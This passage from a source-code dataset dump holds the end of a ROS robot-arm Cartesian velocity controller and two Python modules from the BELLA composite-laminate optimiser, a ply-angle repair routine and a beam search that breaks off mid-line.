feedback.POSE_UPDATE:\n self.mutex.acquire()\n R = tf.transformations.quaternion_matrix((feedback.pose.orientation.x,\n feedback.pose.orientation.y,\n feedback.pose.orientation.z,\n feedback.pose.orientation.w))\n T = tf.transformations.translation_matrix((feedback.pose.position.x, \n feedback.pose.position.y, \n feedback.pose.position.z))\n self.x_target = numpy.dot(T,R)\n self.mutex.release()\n\n def timer_callback(self, event):\n msg = JointState()\n if self.ee_tracking or self.red_tracking:\n self.mutex.acquire()\n dq = cartesian_control(self.joint_transforms, \n self.q_current, self.q0_desired,\n self.x_current, self.x_target)\n self.mutex.release()\n msg.velocity = dq\n else: \n 
msg.velocity = numpy.zeros(7)\n self.pub_vel.publish(msg)\n \n def callback(self, joint_values):\n root = self.robot.get_root()\n T = tf.transformations.identity_matrix()\n self.mutex.acquire()\n self.joint_transforms = []\n self.q_current = joint_values.position\n self.process_link_recursive(root, T, joint_values)\n if not self.ee_tracking:\n self.update_marker(self.x_current)\n self.mutex.release()\n\n def align_with_z(self, axis):\n T = tf.transformations.identity_matrix()\n z = numpy.array([0,0,1])\n x = numpy.array([1,0,0])\n dot = numpy.dot(z,axis)\n if dot == 1: return T\n if dot == -1: return tf.transformations.rotation_matrix(math.pi, x)\n rot_axis = numpy.cross(z, axis)\n angle = math.acos(dot)\n return tf.transformations.rotation_matrix(angle, rot_axis)\n\n def process_link_recursive(self, link, T, joint_values):\n if link not in self.robot.child_map: \n self.x_current = T\n return\n for i in range(0,len(self.robot.child_map[link])):\n (joint_name, next_link) = self.robot.child_map[link][i]\n if joint_name not in self.robot.joint_map:\n rospy.logerr(\"Joint not found in map\")\n continue\n current_joint = self.robot.joint_map[joint_name] \n\n trans_matrix = tf.transformations.translation_matrix((current_joint.origin.xyz[0], \n current_joint.origin.xyz[1],\n current_joint.origin.xyz[2]))\n rot_matrix = tf.transformations.euler_matrix(current_joint.origin.rpy[0], \n current_joint.origin.rpy[1],\n current_joint.origin.rpy[2], 'rxyz')\n origin_T = numpy.dot(trans_matrix, rot_matrix)\n current_joint_T = numpy.dot(T, origin_T)\n if current_joint.type != 'fixed':\n if current_joint.name not in joint_values.name:\n rospy.logerr(\"Joint not found in list\")\n continue\n # compute transform that aligns rotation axis with z\n aligned_joint_T = numpy.dot(current_joint_T, self.align_with_z(current_joint.axis))\n self.joint_transforms.append(aligned_joint_T)\n index = joint_values.name.index(current_joint.name)\n angle = joint_values.position[index]\n joint_rot_T = tf.transformations.rotation_matrix(angle, \n numpy.asarray(current_joint.axis))\n next_link_T = numpy.dot(current_joint_T, joint_rot_T) \n else:\n next_link_T = current_joint_T\n\n self.process_link_recursive(next_link, next_link_T, joint_values)\n \n\nif __name__ == '__main__':\n rospy.init_node('cartesian_control', anonymous=True)\n cc = CartesianControl()\n rospy.spin()\n"
}
] | 2 |
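
The cartesian_control function in the second record above composes a primary end-effector velocity task with a secondary joint task projected into the Jacobian null space. A condensed numpy sketch of that composition follows; the function name and damping value are illustrative, and J is assumed given (the file itself assembles J column by column from the per-joint transforms):

    import numpy as np

    def resolved_rate_step(J, v_ee, dq_secondary, rcond=1e-2):
        # Primary task: track the desired end-effector twist through the
        # damped pseudoinverse of the Jacobian.
        J_pinv = np.linalg.pinv(J, rcond=rcond)
        dq = J_pinv.dot(v_ee)
        # Secondary task (e.g. steering joint 0 toward q0_desired) projected
        # into the null space of J so it cannot disturb end-effector motion.
        N = np.eye(J.shape[1]) - J_pinv.dot(J)
        dq += N.dot(dq_secondary)
        # Saturate, mirroring the 1 rad/s joint-velocity scaling in the file.
        norm = np.linalg.norm(dq)
        if norm > 1.0:
            dq /= norm
        return dq
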
noemiefedon/BELLA
|
https://github.com/noemiefedon/BELLA
|
2c23daaa8dac9b5340b9f983561bd1bb3625c128
|
ca86e5cd6f593478235c64aa4d0409b0e78dbcbb
|
0e286f754e7ce032aa80477c8c3a5f6262fce38b
|
refs/heads/main
| 2023-04-01T11:41:15.125542 | 2021-03-24T12:00:54 | 2021-03-24T12:00:54 | 343,455,890 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5537744164466858,
"alphanum_fraction": 0.5833090543746948,
"avg_line_length": 37.895347595214844,
"blob_id": "a0f986be43ecb50ab5fbce043f3ca4dcec4d7dcc",
"content_id": "9f077802014bf68a89b7e9b7b772973129944ab1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10293,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 258,
"path": "/src/RELAY/repair_membrane_1_ipo_Abdalla.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n- calc_objA_options_1\r\n calculates the possible in-plane objective function values achievable by\r\n modifying the fibre orientations of couples of angled plies\r\n\r\n- repair_membrane_1_ipo:\r\n repair for membrane properties only accounting for one panel when the\r\n laminate must remain balanced\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.sorting import sortAccording\r\nfrom src.RELAY.repair_10_bal import calc_ind_plies\r\nfrom src.RELAY.repair_10_bal import calc_lampamA_ply_queue\r\nfrom src.RELAY.repair_10_bal import calc_lampamA_options_1\r\nfrom src.RELAY.repair_membrane_1_ipo import calc_objA_options_1\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_Abdalla\r\n\r\ndef repair_membrane_1_ipo_Abdalla(\r\n ss_ini, ply_queue_ini, in_plane_coeffs,\r\n p_A, lampam_target, constraints):\r\n \"\"\"\r\n modifies a stacking sequence to better converge towards the in-plane target\r\n lamination parameters. The modifications preserves the satisfaction to the\r\n 10% rule formulated by Abdalla, to the balance requirements and to the\r\n damage tolerance constraints.\r\n\r\n First the fibre orientations of couples of angled plies situated in the\r\n middle of the laminate are modified to ensure convergence for the\r\n in-plane lamination parameters.\r\n Then the fibre orientations of 0 and 90 deg plies may be modified to the\r\n other orientation.\r\n\r\n INPUTS\r\n\r\n - ss_ini: partially retrieved stacking sequence\r\n - ply_queue_ini: queue of plies for innermost plies\r\n - in_plane_coeffs: coefficients in the in-plane objective function\r\n - p_A: coefficient for the proportion of the laminate thickness that can be\r\n modified during the repair for membrane properties\r\n - lampam_target: lamination parameter targets\r\n - constraints: design and manufacturing constraints\r\n - in_plane_coeffs: coefficients in the in-plane objective function\r\n \"\"\"\r\n\r\n n_plies = ss_ini.size\r\n\r\n ss = np.copy(ss_ini)\r\n ply_queue = ply_queue_ini[:]\r\n\r\n\r\n lampamA = calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints)\r\n objA = sum(in_plane_coeffs * ((lampamA - lampam_target[0:4]) ** 2))\r\n# print()\r\n# print('lampamA', lampamA)\r\n# print('objA', objA)\r\n\r\n ss_list = [np.copy(ss)]\r\n ply_queue_list = [ply_queue[:]]\r\n lampamA_list = [lampamA]\r\n objA_list = [objA]\r\n\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints, p_A)\r\n indices_to_sort = list(indices_1)\r\n indices_to_sort.insert(0, -1)\r\n# print('indices_1', list(indices_1))\r\n# print('indices_per_angle', list(indices_per_angle))\r\n# print('indices_to_sort', indices_to_sort)\r\n\r\n lampamA_options = calc_lampamA_options_1(n_plies, constraints)\r\n objA_options = calc_objA_options_1(\r\n lampamA, lampamA_options, lampam_target, constraints, in_plane_coeffs)\r\n\r\n while np.min(objA_options) + 1e-20 < objA and objA > 1e-10:\r\n# print('objA', objA)\r\n# print('objA_options', objA_options)\r\n\r\n # attempts at modifying a couple of angled plies\r\n ind_pos_angle1, ind_pos_angle2 = np.unravel_index(\r\n np.argmin(objA_options, axis=None), objA_options.shape)\r\n angle1 = constraints.pos_angles[ind_pos_angle1]\r\n angle2 = constraints.pos_angles[ind_pos_angle2]\r\n# print('angle1', angle1, 'angle2', angle2)\r\n ind_angle1 = constraints.ind_angles_dict[angle1]\r\n ind_angle1_minus = 
constraints.ind_angles_dict[-angle1]\r\n ind_angle2 = constraints.ind_angles_dict[angle2]\r\n ind_angle2_minus = constraints.ind_angles_dict[-angle2]\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n\r\n # if plies +-theta exist in the middle of the laminate\r\n if angle1 in [0, 90]:\r\n # if no couple of plies to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 2:\r\n objA_options[ind_pos_angle1, ind_pos_angle2] = 1e10\r\n continue\r\n else:\r\n # if no couple of plies to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 1 \\\r\n or len(indices_per_angle[ind_angle1_minus]) < 1:\r\n objA_options[ind_pos_angle1, ind_pos_angle2] = 1e10\r\n continue\r\n\r\n # attention to not break the 10% rule\r\n LPs = lampamA + lampamA_options[ind_pos_angle2] - lampamA_options[\r\n ind_pos_angle1]\r\n if calc_distance_Abdalla(LPs, constraints) > 1e-10:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n\r\n# print('objA_options after clean', objA_options)\r\n# print('+-', angle1, ' plies changed into +-', angle2, 'plies')\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle[ind_angle1]', indices_per_angle[ind_angle1])\r\n# print('indices_per_angle[ind_angle2]', indices_per_angle[ind_angle2])\r\n\r\n lampamA = LPs\r\n objA = objA_options[ind_pos_angle1, ind_pos_angle2]\r\n# print()\r\n# print('lampamA', lampamA)\r\n# print('objA', objA)\r\n\r\n # modification of the stacking sequence\r\n ind_ply_1 = indices_per_angle[ind_angle1].pop(0)\r\n ind_ply_2 = indices_per_angle[ind_angle1_minus].pop(0)\r\n# print('ind_ply_1', ind_ply_1)\r\n# print('ind_ply_2', ind_ply_2)\r\n# print('ply_queue', ply_queue)\r\n\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(angle1)\r\n ply_queue.append(angle2)\r\n else:\r\n ss[ind_ply_1] = angle2\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n if ind_ply_2 == 6666: # ply from the queue\r\n if angle1 == 90:\r\n ply_queue.remove(90)\r\n else:\r\n ply_queue.remove(-angle1)\r\n\r\n if angle2 == 90:\r\n ply_queue.append(90)\r\n else:\r\n ply_queue.append(-angle2)\r\n else:\r\n if angle2 != 90:\r\n ss[ind_ply_2] = -angle2\r\n else:\r\n ss[ind_ply_2] = 90\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_2 - 1] = ss[ind_ply_2]\r\n\r\n# lampamA_check = calc_lampamA_ply_queue(\r\n# ss, ss.size, ply_queue, constraints)\r\n\r\n ss_list.insert(0, np.copy(ss))\r\n ply_queue_list.insert(0, ply_queue[:])\r\n lampamA_list.insert(0, np.copy(lampamA))\r\n objA_list.insert(0, objA)\r\n\r\n indices_per_angle[ind_angle2].append(ind_ply_1)\r\n indices_per_angle[ind_angle2_minus].append(ind_ply_2)\r\n if constraints.sym:\r\n indices_per_angle[ind_angle2].sort(reverse=True)\r\n indices_per_angle[ind_angle2_minus].sort(reverse=True)\r\n else:\r\n sortAccording(indices_per_angle[ind_angle2], indices_to_sort)\r\n sortAccording(indices_per_angle[ind_angle2_minus], indices_to_sort)\r\n indices_per_angle[ind_angle2].reverse()\r\n indices_per_angle[ind_angle2_minus].reverse()\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n# print('objA', objA)\r\n if objA < 1e-10:\r\n break\r\n\r\n objA_options = calc_objA_options_1(\r\n lampamA, lampamA_options, lampam_target, constraints,\r\n in_plane_coeffs)\r\n\r\n# print('objA', objA)\r\n\r\n # attempt at changing a 0 deg ply into a 90 deg ply\r\n ind_0 = np.where(constraints.pos_angles == 0)[0][0]\r\n ind_90 = np.where(constraints.pos_angles == 90)[0][0]\r\n\r\n if 
indices_per_angle[constraints.ind_angles_dict[0]]:\r\n\r\n LPs = lampamA + (lampamA_options[ind_90] - lampamA_options[ind_0])/2\r\n obj_0_to_90 = sum(in_plane_coeffs*((LPs - lampam_target[0:4])**2))\r\n\r\n# print('obj_0_to_90', obj_0_to_90)\r\n\r\n if obj_0_to_90 + 1e-20 < objA \\\r\n and calc_distance_Abdalla(LPs, constraints) == 0:\r\n# print('excess_10[0]', excess_10[0])\r\n# print('0 deg ply changed to 90 deg ply')\r\n objA = obj_0_to_90\r\n lampamA += (lampamA_options[ind_90] - lampamA_options[ind_0])/2\r\n ind_ply_1 = indices_per_angle[constraints.index0].pop(0)\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(0)\r\n ply_queue.append(90)\r\n else:\r\n ss[ind_ply_1] = 90\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n ss_list.insert(0, np.copy(ss))\r\n ply_queue_list.insert(0, ply_queue[:])\r\n lampamA_list.insert(0, np.copy(lampamA))\r\n objA_list.insert(0, objA)\r\n# print()\r\n# print('lampamA', lampamA)\r\n# print('objA', objA)\r\n\r\n return ss_list, ply_queue_list, lampamA_list, objA_list\r\n\r\n # attempt at changing a 90 deg ply into a 0 deg ply\r\n if indices_per_angle[constraints.ind_angles_dict[90]]:\r\n LPs = lampamA + (lampamA_options[ind_0] - lampamA_options[ind_90])/2\r\n obj_90_to_0 = sum(in_plane_coeffs * ((LPs - lampam_target[0:4])**2))\r\n# print('obj_90_to_0', obj_90_to_0)\r\n\r\n if obj_90_to_0 + 1e-20 < objA\\\r\n and calc_distance_Abdalla(LPs, constraints) == 0:\r\n# print('90 deg ply changed to 0 deg ply')\r\n objA = obj_90_to_0\r\n lampamA += (lampamA_options[ind_0] - lampamA_options[ind_90])/2\r\n ind_ply_1 = indices_per_angle[constraints.index90].pop(0)\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(90)\r\n ply_queue.append(0)\r\n else:\r\n ss[ind_ply_1] = 0\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n ss_list.insert(0, np.copy(ss))\r\n ply_queue_list.insert(0, ply_queue[:])\r\n lampamA_list.insert(0, np.copy(lampamA))\r\n objA_list.insert(0, objA)\r\n# print()\r\n# print('lampamA', lampamA)\r\n# print('objA', objA)\r\n\r\n return ss_list, ply_queue_list, lampamA_list, objA_list\r\n"
},
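
The repair routine above repeatedly evaluates a weighted squared distance between the current in-plane lamination parameters and their targets, then greedily applies the candidate ply-angle change with the lowest predicted value. A self-contained sketch of that objective and the greedy pick; the array contents are made-up illustration values, not project data:

    import numpy as np

    def in_plane_objective(lampam_A, lampam_target, coeffs):
        # Weighted squared distance to the in-plane targets (lampam 1-4).
        return float(np.sum(coeffs * (lampam_A - lampam_target[:4]) ** 2))

    coeffs = np.array([1.0, 1.0, 0.5, 0.5])
    lampam_A = np.array([0.20, -0.10, 0.0, 0.0])
    target = np.zeros(12)
    target[:2] = [0.25, -0.05]
    print(in_plane_objective(lampam_A, target, coeffs))  # ~0.005

    # Greedy step: lowest predicted objective over all candidate swaps,
    # as in the np.unravel_index(np.argmin(...)) call of the repair loop.
    objA_options = np.array([[0.4, 0.1], [0.3, 0.2]])
    i, j = np.unravel_index(np.argmin(objA_options), objA_options.shape)
    print(i, j)  # 0 1
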
{
"alpha_fraction": 0.5046149492263794,
"alphanum_fraction": 0.5177241563796997,
"avg_line_length": 41.974510192871094,
"blob_id": "2acd5f3012e261f4fcbec139fb9fc19c7a697079",
"content_id": "36267fc5314cf71a5fc850fc75f5076e9e040a7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22427,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 510,
"path": "/src/LAYLA_V02/beam_search.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# - * - coding: utf - 8 - * -\r\n\"\"\"\r\nBeam search for a ply group search\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport math as ma\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.balance import calc_penalty_bal\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo_oopo_ss\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\nfrom src.CLA.lampam_functions import calc_lampam_from_delta_lp_matrix\r\nfrom src.LAYLA_V02.objectives import calc_obj_multi_ss, objectives\r\nfrom src.LAYLA_V02.pruning import pruning_diso_contig_damtol\r\nfrom src.RELAY.repair_ss import repair_ss\r\nfrom src.divers.arrays import max_arrays\r\n\r\n# do you want to save the success rate of the repair strategy?\r\nSAVE_SUCCESS_RATE = True\r\n\r\ndef beam_search(\r\n levels,\r\n lampam_current,\r\n lampam_weightings,\r\n group_size,\r\n targets,\r\n parameters,\r\n constraints,\r\n n_plies_per_angle,\r\n cummul_mom_areas,\r\n delta_lampams,\r\n last_group=False,\r\n mat_prop=None,\r\n not_constraints=None,\r\n random_for_10=0,\r\n middle_ply=0,\r\n ss_top=None,\r\n ss_bot=None):\r\n '''\r\n beam search for a ply group search\r\n\r\n INPUTS\r\n\r\n - levels: ply indices\r\n - n_plies_in_groups: number of plies in each group of plies\r\n - lampam_current: lamination parameters of all plies in the laminate but\r\n not the plies in the group under optimisation\r\n - n_plies_per_angle: ply counts in each fibre direction of all plies in the\r\n laminate but not the plies in the group under optimisation\r\n - lampam_weightings: lamination parameter weightings at each search level\r\n - group_size: size of the ply group under determination\r\n - parameters: parameters of the optimiser\r\n - constraints: lay-up design guidelines\r\n - targets: target lamination parameters and ply counts\r\n - mat_prop: material properties\r\n - cummul_mom_areas: cummulated ply moments of areas\r\n - last_group: flag indicating of the last ply group is to be optimised\r\n - not_constraints: design guidelines that should not be satisfied\r\n - random_for_10: number to decide a ply orientation in which the 10% rule\r\n must not be satisfied\r\n - delta_lampams: ply partial lamination parameters\r\n - middle_ply: middle ply position of symmetric laminates, 0 otherwise\r\n - ss_top_ini: lay-up of plies at the top of the laminate\r\n - ss_bot_ini:lay-up of plies at the bottom of the laminate\r\n '''\r\n results = beamsearchResults()\r\n\r\n # details for when the 10% rule should be violated\r\n if not_constraints is not None and not_constraints.rule_10_percent:\r\n n_plies_0_lim = ma.ceil(not_constraints.percent_0 * targets.n_plies)\r\n n_plies_90_lim = ma.ceil(\r\n not_constraints.percent_90 * targets.n_plies)\r\n n_plies_45_lim = ma.ceil(\r\n not_constraints.percent_45 * targets.n_plies)\r\n n_plies_135_lim = ma.ceil(\r\n not_constraints.percent_135 * targets.n_plies)\r\n n_plies_45_135_lim = ma.ceil(\r\n not_constraints.percent_45_135 * targets.n_plies)\r\n if constraints.sym:\r\n n_plies_0_lim = ma.ceil(n_plies_0_lim / 2)\r\n n_plies_90_lim = ma.ceil(n_plies_90_lim / 2)\r\n n_plies_45_lim = ma.ceil(n_plies_45_lim / 2)\r\n n_plies_135_lim = ma.ceil(n_plies_135_lim / 2)\r\n n_plies_45_135_lim = ma.ceil(n_plies_45_135_lim / 2)\r\n\r\n # simplifies ss_top and ss_bot for faster feasibility checks?\r\n 
ss_bot_simp = np.copy(ss_bot)\r\n if not constraints.sym:\r\n ss_top_simp = np.copy(ss_top)\r\n\r\n if constraints.contig or constraints.diso:\r\n if ss_bot.size > constraints.n_contig:\r\n ss_bot_simp = ss_bot[-constraints.n_contig:]\r\n\r\n if not constraints.sym:\r\n if ss_top.size > constraints.n_contig:\r\n ss_top_simp = ss_top[:constraints.n_contig]\r\n\r\n # nodal stacking sequences\r\n ss_bot_tab = [np.array((), dtype='int16')]\r\n if not constraints.sym:\r\n ss_top_tab = [np.array((), dtype='int16')]\r\n # nodal lamination parameters\r\n lampam_tab = lampam_current.reshape((1, 12))\r\n # estimate functions\r\n obj_const_tab = np.zeros((1,), float)\r\n # nodal ply counts in each fibre orientations\r\n ply_counts_tab = n_plies_per_angle.reshape((1, constraints.n_set_of_angles))\r\n\r\n if last_group:\r\n ss_final = np.array((), dtype='int16').reshape((0, targets.n_plies))\r\n\r\n for local_level in range(group_size):\r\n\r\n level = levels[local_level]\r\n# print('********************************')\r\n# print('level', level)\r\n\r\n for el in range(obj_const_tab.size):\r\n\r\n try:\r\n mother_lampam = lampam_tab[0]\r\n except IndexError:\r\n raise Exception(\r\n 'Infeasible beam-search, increase the branching limits')\r\n\r\n mother_ss_bot = ss_bot_tab.pop(0)\r\n if not constraints.sym:\r\n mother_ss_top = ss_top_tab.pop(0)\r\n mother_ply_counts = ply_counts_tab[0]\r\n\r\n\r\n # deletion of the mother lamination parameters/ply counts/estimate\r\n # function values from the queues\r\n lampam_tab = np.delete(lampam_tab, np.s_[0], axis=0)\r\n ply_counts_tab = np.delete(ply_counts_tab, np.s_[0], axis=0)\r\n obj_const_tab = np.delete(obj_const_tab, np.s_[0])\r\n\r\n # branching\r\n child_ss = np.copy(constraints.set_of_angles)\r\n\r\n # pruning\r\n if constraints.sym:\r\n child_ss = pruning_diso_contig_damtol(\r\n child_ss=child_ss,\r\n mother_ss_bot=mother_ss_bot,\r\n ss_bot_simp=ss_bot_simp,\r\n level=level,\r\n constraints=constraints,\r\n targets=targets)\r\n else:\r\n child_ss = pruning_diso_contig_damtol(\r\n child_ss=child_ss,\r\n mother_ss_bot=mother_ss_bot,\r\n mother_ss_top=mother_ss_top,\r\n ss_bot_simp=ss_bot_simp,\r\n ss_top_simp=ss_top_simp,\r\n level=level,\r\n constraints=constraints,\r\n targets=targets)\r\n\r\n# print(child_ss)\r\n\r\n if child_ss is None:\r\n continue\r\n\r\n# print('mother_ss', mother_ss)\r\n# print('child_ss after pruning diso/contig/damtol', child_ss.T)\r\n\r\n # caluclate the lamination parameters\r\n child_lampam = np.matlib.repmat(mother_lampam, child_ss.size, 1)\r\n for myindex in range(child_ss.size):\r\n child_lampam[myindex] += delta_lampams[\r\n level, constraints.ind_angles_dict[child_ss[myindex]]]\r\n\r\n # calculate the ply counts\r\n # & compute the stacking sequences\r\n # & calculate the penalties for the 10% rule\r\n penalty_10 = np.array((), float)\r\n n_solution = 0\r\n for indd in range(child_ss.size)[::-1]:\r\n\r\n ply_counts = np.copy(mother_ply_counts)\r\n index = constraints.ind_angles_dict[child_ss[indd]]\r\n if middle_ply != 0 and local_level == group_size - 1:\r\n ply_counts[index] += 1/2\r\n else:\r\n ply_counts[index] += 1\r\n\r\n # pruning for not_constraints\r\n if not_constraints is not None \\\r\n and not_constraints.rule_10_percent:\r\n if random_for_10 == 0 \\\r\n and ply_counts[constraints.index0] + 1 >= n_plies_0_lim:\r\n continue\r\n if random_for_10 == 1\\\r\n and ply_counts[constraints.index90] + 1 >= n_plies_90_lim:\r\n continue\r\n if random_for_10 == 2 \\\r\n and ply_counts[constraints.index45] + 1 >= 
n_plies_45_lim:\r\n continue\r\n if random_for_10 == 3 \\\r\n and ply_counts[constraints.index135] + 1 >= n_plies_135_lim:\r\n continue\r\n if random_for_10 == 4 \\\r\n and ply_counts[constraints.index45] + \\\r\n ply_counts[constraints.index135] + 1 >= n_plies_45_135_lim:\r\n continue\r\n\r\n # penalty for the 10% rule\r\n if local_level == group_size - 1 \\\r\n and constraints.rule_10_percent \\\r\n and parameters.penalty_10_pc_switch:\r\n penalty_10 = np.hstack((\r\n penalty_10,\r\n calc_penalty_10_pc(ply_counts, constraints)))\r\n\r\n n_solution += 1\r\n\r\n if constraints.sym:\r\n new_stack_bot = np.copy(mother_ss_bot)\r\n new_stack_bot = np.hstack((new_stack_bot, child_ss[indd]))\r\n ss_bot_tab.append(new_stack_bot)\r\n else:\r\n new_stack_bot = np.copy(mother_ss_bot)\r\n new_stack_top = np.copy(mother_ss_top)\r\n\r\n if local_level % 2:\r\n new_stack_top = np.hstack((\r\n child_ss[indd], new_stack_top))\r\n else:\r\n new_stack_bot = np.hstack((\r\n new_stack_bot, child_ss[indd]))\r\n ss_bot_tab.append(new_stack_bot)\r\n ss_top_tab.append(new_stack_top)\r\n\r\n# print('new_stack_bot', new_stack_bot)\r\n# print('new_stack_top', new_stack_top)\r\n\r\n lampam_tab = np.vstack((lampam_tab, child_lampam[indd]))\r\n ply_counts_tab = np.vstack((ply_counts_tab, ply_counts))\r\n\r\n if penalty_10.size == 0:\r\n penalty_10 = 0\r\n\r\n results.n_nodes += n_solution\r\n if n_solution == 0:\r\n continue # go to next branching\r\n\r\n # estimate function values with no constraints\r\n# print('no - constraints')\r\n# for el in lampam_tab[lampam_tab.shape[0] - n_solution:]:\r\n# print('lampam', el[0:4])\r\n obj_no_constraints = objectives(\r\n lampam=lampam_tab[lampam_tab.shape[0] - n_solution:],\r\n targets=targets,\r\n lampam_weightings=lampam_weightings[level],\r\n constraints=constraints,\r\n parameters=parameters,\r\n mat_prop=mat_prop)\r\n\r\n if last_group and local_level == group_size - 1:\r\n\r\n # full stacking sequences\r\n for indd in range(n_solution)[::-1]:\r\n indddd = len(ss_bot_tab) - indd - 1\r\n# print('child_ss_tab[indddd]', child_ss_tab[indddd])\r\n\r\n if constraints.sym:\r\n ss = np.hstack((\r\n ss_bot,\r\n ss_bot_tab[indddd],\r\n np.flip(ss_bot_tab[indddd], axis=0),\r\n np.flip(ss_bot, axis=0))).astype('int16')\r\n if middle_ply != 0:\r\n ss = np.delete(ss, np.s_[middle_ply], axis=0)\r\n else:\r\n ss = np.hstack((\r\n ss_bot,\r\n ss_bot_tab[indddd],\r\n ss_top_tab[indddd],\r\n ss_top)).astype('int16')\r\n if ss.size != targets.n_plies:\r\n print('ss.size', ss.size)\r\n print('targets.n_plies', targets.n_plies)\r\n raise Exception(\"This should not happen\")\r\n\r\n # repair\r\n results.n_designs_last_level += 1\r\n# print('before repair')\r\n# print_ss(ss)\r\n# print('obj_no_constraints ', obj_no_constraints )\r\n ss, success_repair, n_obj_func_D_calls = repair_ss(\r\n ss, constraints, parameters, targets.lampam, True)\r\n# results.n_obj_func_calls += n_obj_func_D_calls\r\n# print('repair successful?', success_repair)\r\n# print('after repair')\r\n# print_ss(ss)\r\n# print('obj_no_constraints ', obj_no_constraints )\r\n if success_repair:\r\n results.n_designs_repaired += 1\r\n# print('no - constraints - after success full repair')\r\n obj_no_constraints[n_solution - indd - 1] = objectives(\r\n lampam=calc_lampam_from_delta_lp_matrix(\r\n ss, constraints, delta_lampams),\r\n targets=targets,\r\n lampam_weightings=lampam_weightings[level],\r\n constraints=constraints,\r\n parameters=parameters,\r\n mat_prop=mat_prop)\r\n# results.n_obj_func_calls += 1\r\n check_lay_up_rules(ss, 
constraints)\r\n lampam_tab[indddd] = calc_lampam_from_delta_lp_matrix(\r\n ss, constraints, delta_lampams)\r\n else:\r\n# print('unsuccess full repair')\r\n obj_no_constraints[n_solution - indd - 1] = 1e10\r\n ss_final = np.vstack((ss_final, ss))\r\n\r\n\r\n # calculation the penalties for the in-plane and out-of-plane\r\n # orthotropy requirements based on lamination parameters\r\n penalty_ipo_lampam, penalty_oopo = calc_penalty_ipo_oopo_ss(\r\n lampam_tab[lampam_tab.shape[0] - n_solution:],\r\n constraints=constraints,\r\n parameters=parameters,\r\n cummul_areas=cummul_mom_areas[level, 0],\r\n cummul_sec_mom_areas=cummul_mom_areas[level, 2])\r\n# print('penalty_ipo_lampam', penalty_ipo_lampam.shape)\r\n# print('penalty_oopo', penalty_oopo.shape)\r\n\r\n # calculation the penalties for the in-plane orthotropy\r\n # requirements based on ply counts\r\n penalty_ipo_pc = np.zeros((n_solution,))\r\n if constraints.ipo and parameters.penalty_bal_switch:\r\n penalty_ipo_pc = calc_penalty_bal(\r\n ply_counts,\r\n constraints=constraints,\r\n cummul_areas=cummul_mom_areas[level, 0])\r\n# print('penalty_ipo_pc', penalty_ipo_pc.shape)\r\n\r\n penalty_bal_ipo = max_arrays(penalty_ipo_pc, penalty_ipo_lampam)\r\n\r\n # calculation of the bounds\r\n obj_const = calc_obj_multi_ss(\r\n objective=obj_no_constraints,\r\n penalty_10=penalty_10,\r\n penalty_bal_ipo=penalty_bal_ipo,\r\n penalty_oopo=penalty_oopo,\r\n coeff_10=parameters.coeff_10,\r\n coeff_bal_ipo=parameters.coeff_bal_ipo,\r\n coeff_oopo=parameters.coeff_oopo)\r\n obj_const_tab = np.hstack((obj_const_tab, obj_const))\r\n\r\n# print('')\r\n# print('lampam_tab', lampam_tab.shape)\r\n# print('obj_const_tab', obj_const_tab.shape)\r\n# print('mother_ss', mother_ss)\r\n# print('mother_lampam', mother_lampam[0:4])\r\n# print('child_ss', child_ss.T)\r\n# print('lampam_tab', lampam_tab[-1][0:4])\r\n# print('lampam_tab', lampam_tab[-2][0:4])\r\n# print('lampam_tab', lampam_tab[-3][0:4])\r\n# print('obj_const', obj_const, '\\n\\n')\r\n\r\n # local pruning\r\n n_local_nodes = obj_const.size\r\n if last_group and local_level != group_size - 1:\r\n node_limit = parameters.local_node_limit_final\r\n else:\r\n node_limit = parameters.local_node_limit\r\n n_excess_nodes = n_local_nodes - node_limit\r\n if local_level != group_size - 1 and n_excess_nodes > 0:\r\n obj_const_tab_to_del = np.copy(obj_const)\r\n to_del = []\r\n for counter in range(n_excess_nodes):\r\n ind_max = np.argmax(obj_const_tab_to_del)\r\n obj_const_tab_to_del[ind_max] = -6666\r\n to_del.append(ind_max + obj_const_tab.size - n_local_nodes)\r\n ss_bot_tab = [elem for ind, elem in enumerate(ss_bot_tab) \\\r\n if ind not in to_del]\r\n if not constraints.sym:\r\n ss_top_tab = [elem for ind, 